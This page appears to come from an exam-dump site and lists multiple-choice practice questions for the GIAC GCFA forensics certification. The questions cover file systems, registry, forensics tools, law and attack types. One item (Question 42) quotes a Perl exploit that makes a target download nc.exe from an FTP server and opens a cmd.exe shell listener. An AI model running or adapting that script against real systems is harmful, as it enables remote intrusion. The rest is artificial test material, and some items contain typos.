New Year Special Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > GIAC > Forensics > GCFA

GCFA GIACCertified Forensics Analyst Question and Answers

Question # 4

Which of the following switches of the XCOPY command copies attributes while copying files?

A.

/o

B.

/p

C.

/k

D.

/s

Full Access
Question # 5

Which of the following types of computers is used for attracting potential intruders?

A.

Bastion host

B.

Data pot

C.

Files pot

D.

Honey pot

Full Access
Question # 6

John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are-secure server. To perform his task, he first of all sends a virus that continuously changes its signature to avoid detection from IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing?

A.

Evasion attack

B.

Session splicing attack

C.

Insertion attack

D.

Polymorphic shell code attack

Full Access
Question # 7

Which of the following is the process of overwriting all addressable locations on a disk?

A.

Drive wiping

B.

Spoofing

C.

Sanitization

D.

Authentication

Full Access
Question # 8

Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task?

A.

ping

B.

Psloggedon

C.

Pslist

D.

fport

Full Access
Question # 9

You are handling technical support calls for an insurance company. A user calls you complaining that he cannot open a file, and that the file name appears in green while opening in Windows Explorer.

What does this mean?

A.

The file is encrypted.

B.

The file belongs to another user.

C.

The file is infected with virus.

D.

The file is compressed.

Full Access
Question # 10

Which of the following is a file management tool?

A.

Defrag

B.

MSCONFIG

C.

Device Manager

D.

Windows Explorer

Full Access
Question # 11

John works for an Internet Service Provider (ISP) in the United States. He discovered child

pornography material on a Web site hosted by the ISP. John immediately informed law enforcement authorities about this issue. Under which of the following Acts is John bound to take such an action?

A.

Civil Rights Act of 1991

B.

PROTECT Act

C.

Civil Rights Act of 1964

D.

Sexual Predators Act

Full Access
Question # 12

John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He is working on the Linux operating system. He wants to sniff the we-are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task?

A.

Ethercap

B.

Tripwire

C.

Hunt

D.

IPChains

Full Access
Question # 13

A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel?

A.

OpenSSH

B.

IPTables

C.

IPChains

D.

Stunnel

Full Access
Question # 14

You work as a Network Administrator for Perfect Solutions Inc. You install Windows 98 on a computer. By default, which of the following folders does Windows 98 setup use to keep the registry tools?

A.

$SYSTEMROOT$REGISTRY

B.

$SYSTEMROOT$WINDOWS

C.

$SYSTEMROOT$WINDOWSREGISTRY

D.

$SYSTEMROOT$WINDOWSSYSTEM32

Full Access
Question # 15

By gaining full control of router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack Routers?

Each correct answer represents a complete solution. Choose all that apply.

A.

By launching Social Engineering attack

B.

By launching Max Age attack

C.

Route table poisoning

D.

By launching Sequence++ attack

Full Access
Question # 16

Which of the following parameters is NOT used for calculating the capacity of the hard disk?

A.

Bytes per sector

B.

Number of heads

C.

Total number of sectors

D.

Number of platters

Full Access
Question # 17

Which of the following is described in the following statement?

"It is a 512 bytes long boot sector that is the first sector of a default boot drive. It is also known as Volume Boot Sector, if the boot drive is un-partitioned. "

A.

BIOS

B.

SBR

C.

POST

D.

MBR

Full Access
Question # 18

Which of the following file systems is used by both CD and DVD?

A.

Network File System (NFS)

B.

New Technology File System (NTFS)

C.

Compact Disk File System (CDFS)

D.

Universal Disk Format (UDF)

Full Access
Question # 19

Which of the following registry hives stores configuration information specific to a particular user who is currently logged on to the computer?

A.

HKEY_USERS

B.

HKEY_CURRENT_USER

C.

HKEY_LOCAL_MACHINE

D.

HKEY_CLASSES_ROOT

Full Access
Question # 20

Which of the following provides high availability of data?

A.

RAID

B.

Anti-virus software

C.

EFS

D.

Backup

Full Access
Question # 21

Which of the following is a password-cracking program?

A.

Netcat

B.

L0phtcrack

C.

SubSeven

D.

NetSphere

Full Access
Question # 22

Which of the following tools is used to block email, Instant Message, Web site, or other media if inappropriate words such as pornography, violence etc. is used?

A.

iProtect

B.

Reveal

C.

iProtectYou

D.

Child Exploitation Tracking System

Full Access
Question # 23

In which of the following files does the Linux operating system store passwords?

A.

Password

B.

Passwd

C.

Shadow

D.

SAM

Full Access
Question # 24

Which of the following representatives of incident response team takes forensic backups of the systems that are the focus of the incident?

A.

Technical representative

B.

Information security representative

C.

Legal representative

D.

Lead investigator

Full Access
Question # 25

Which of the following commands is used to create or delete partitions on Windows XP?

A.

Part

B.

DISKPART

C.

fdisk

D.

Active

Full Access
Question # 26

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following pre-attack phases while testing the security of the server:

Footprinting

Scanning

Now he wants to conduct the enumeration phase. Which of the following tools can John use to conduct it?

Each correct answer represents a complete solution. Choose all that apply.

A.

WinSSLMiM

B.

PsPasswd

C.

PsFile

D.

UserInfo

Full Access
Question # 27

Sandra wants to create a full system state backup of her computer, which is running on Microsoft Windows XP operating system. Which of the following is saved in full state system backup?

Each correct answer represents a complete solution. Choose all that apply.

A.

file system information

B.

Registry

C.

Windows boot files

D.

Active Directory (NTDS)

Full Access
Question # 28

Mark has been hired by a company to work as a Network Assistant. He is assigned the task to

configure a dial-up connection. He is configuring a laptop. Which of the following protocols should he disable to ensure that the password is encrypted during remote access?

A.

MSCHAP

B.

SPAP

C.

MSCHAP V2

D.

PAP

Full Access
Question # 29

You are responsible for tech support at your company. You have been instructed to make certain that all desktops support file and folder encryption. Which file system should you use when installing Windows XP?

A.

FAT

B.

EXT4

C.

FAT32

D.

NTFS

Full Access
Question # 30

Which of the following describes software technologies that improve portability, manageability, and compatibility of applications by encapsulating them from the underlying operating system on which they are executed?

A.

Group Policy

B.

System registry

C.

System control

D.

Application virtualization

Full Access
Question # 31

What is the name of the group of blocks which contains information used by the operating system in Linux system?

A.

logblock

B.

Systemblock

C.

Bootblock

D.

Superblock

Full Access
Question # 32

Adam works as a Security Analyst for Umbrella Inc. He suspects that a virus exists in the network of the company. He scanned the client system with latest signature-based anti-virus, but no productive results have been obtained. Adam suspects that a polymorphic virus exists in the network. Which of the following statements are true about the polymorphic virus?

Each correct answer represents a complete solution. Choose all that apply.

A.

When the user runs the infected file in the disk, it loads virus into the RAM.

B.

The mutation engine of polymorphic virus generates a new encrypted code, this changes the signature of the virus.

C.

It has the ability to mutate and can change its known viral signature and hide from signature based antivirus programs.

D.

The new virus resides in the main memory of the computer and does not infect other files of the operating system.

Full Access
Question # 33

Mark is taking a data backup during non-working hours from a remote computer on the network by using the Backup utility. What will he do to ensure that the backup has no errors?

A.

Verify the backup.

B.

Take a full backup.

C.

Take an incremental backup.

D.

Log off all the users from the network.

Full Access
Question # 34

An organization wants to mitigate the risks associated with the lost or stolen laptops and the associated disclosure laws, while reporting data breaches. Which of the following solutions will be best for the organization?

A.

Hashing function

B.

Digital signature

C.

Trusted Platform Module

D.

Whole disk encryption

Full Access
Question # 35

John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation?

A.

Data will be saved automatically before the system is switched off.

B.

Data will be stored on the ROM.

C.

Data will be saved before the system is switched off if you have configured hibernation to save data.

D.

Unsaved data will be lost when hibernation switches off the system.

Full Access
Question # 36

Which of the following is a nonvolatile form of memory that can be reprogrammed by using a special programming device, and need not to be removed from the PC to be reprogrammed?

A.

PROM

B.

EPROM

C.

EEPROM

D.

SRAM

E.

DRAM

Full Access
Question # 37

Which of the following commands is used to enforce checking of a file system even if the file system seems to be clean?

A.

e2fsck -f

B.

e2fsck -p

C.

e2fsck -b

D.

e2fsck -c

Full Access
Question # 38

Which of the following files in LILO booting process of Linux operating system stores the location of Kernel on the hard drive?

A.

/boot/map

B.

/boot/boot.b

C.

/etc/lilo.conf

D.

/sbin/lilo

Full Access
Question # 39

You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network?

A.

Vulnerability scanning

B.

Setting up IDS

C.

Port scanning

D.

Setting up a honey pot

Full Access
Question # 40

You use the FAT16 file system on your Windows 98 computer. You want to upgrade to the FAT32 file system. What is the advantage of the FAT32 file system over FAT16 file system?

Each correct answer represents a complete solution. Choose two.

A.

It allocates disk space more efficiently.

B.

On startup failure, you can start the computer by using an MS-DOS or Windows 95 bootable floppy disk.

C.

It uses larger cluster sizes.

D.

It supports drives up to 2 terabytes (TB) in size.

Full Access
Question # 41

Which of the following sections of United States Economic Espionage Act of 1996 criminalizes the misappropriation of trade secrets related to or included in a product that is produced for or placed in interstate commerce, with the knowledge or intent that the misappropriation will injure the owner of the trade secret?

A.

Title 18, U.S.C. 1839

B.

Title 18, U.S.C. 1832

C.

Title 18, U.S.C. 1831

D.

Title 18, U.S.C. 1834

Full Access
Question # 42

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl

msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");

system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo

bin>>sasfile\""); system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C

\"echo get hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print

"Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when

download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

A.

Creates an FTP server with write permissions enabled

B.

Opens up a telnet listener that requires no username or password

C.

Opens up a SMTP server that requires no username or password

D.

Creates a share called "sasfile" on the target system

Full Access
Question # 43

Which of the following involves changing data prior to or during input to a computer in an effort to commit fraud?

A.

Data diddling

B.

Spoofing

C.

Eavesdropping

D.

Wiretapping

Full Access
Question # 44

You work as a Network Administrator for NetTech Inc. To ensure the security of files, you encrypt data files using Encrypting File System (EFS). You want to make a backup copy of the files and maintain security settings. You can backup the files either to a network share or a floppy disk. What will you do to accomplish this?

A.

Place the files in an encrypted folder. Then, copy the folder to a floppy disk.

B.

Copy the files to a network share on a FAT32 volume.

C.

Copy the files to a network share on an NTFS volume.

D.

Copy the files to a floppy disk that has been formatted using Windows 2000 Professional.

Full Access
Question # 45

Jason, a game lover, owns an Apple's iPod nano. He wants to play games on his iPod. He also wants to improve the quality of the audio recording of his iPod. Which of the following steps can Jason take to accomplish the task?

A.

Install iPodLinux.

B.

Install third party software.

C.

Upgrade Apple's firmware.

D.

Buy external add-ons.

Full Access
Question # 46

Which of the following classes of hackers describes an individual who uses his computer knowledge for breaking security laws, invading privacy, and making information systems insecure?

A.

White Hat

B.

Black Hat

C.

Gray Hat

D.

Security providing organizations

Full Access
Question # 47

Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate computer of an unfaithful employee of SecureEnet Inc. Suspect's computer runs on Windows operating system. Which of the following sources will Adam investigate on a Windows host to collect the electronic evidences?

Each correct answer represents a complete solution. Choose all that apply.

A.

Swap files

B.

Unused and hidden partition

C.

Slack spaces

D.

Allocated cluster

Full Access